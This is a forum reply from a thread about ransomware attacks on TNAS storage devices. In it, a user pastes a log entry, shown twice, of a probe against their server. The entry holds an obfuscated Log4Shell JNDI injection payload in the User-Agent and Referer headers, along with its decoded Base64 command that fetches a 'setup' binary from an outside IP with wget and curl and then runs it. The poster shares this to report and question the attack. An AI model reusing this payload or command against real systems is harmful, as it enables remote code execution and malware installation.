Re: Urgent Notification about TNAS being Attacked by Ransomware
Posted: 25 Jan 2022, 10:27
REBELinBLUE wrote:
>
people should not try. The question is. if it is burnable what happens afterwards?
will they attack? It is as if I try to force the door of your house to see if a thief can enter.
But look at this logo here.
*********************
OTHERS. MORE ATTACKS
*********************
******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Hos Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Sistema Operativo Desconocido
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************
HTTP Referer: Base64
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit
IP Address: ISP Digital Ocean, LLC = 165.232.155.141
IP Address: ISP Digital Ocean, LLC = 137.184.40.48
The question is. Big companies are dedicated to making attacks? on the servers looking for I don't know what?
this is weird.
>
people should not try. The question is. if it is burnable what happens afterwards?
will they attack? It is as if I try to force the door of your house to see if a thief can enter.
But look at this logo here.
*********************
OTHERS. MORE ATTACKS
*********************
******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Hos Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Sistema Operativo Desconocido
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************
HTTP Referer: Base64
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit
IP Address: ISP Digital Ocean, LLC = 165.232.155.141
IP Address: ISP Digital Ocean, LLC = 137.184.40.48
The question is. Big companies are dedicated to making attacks? on the servers looking for I don't know what?
this is weird.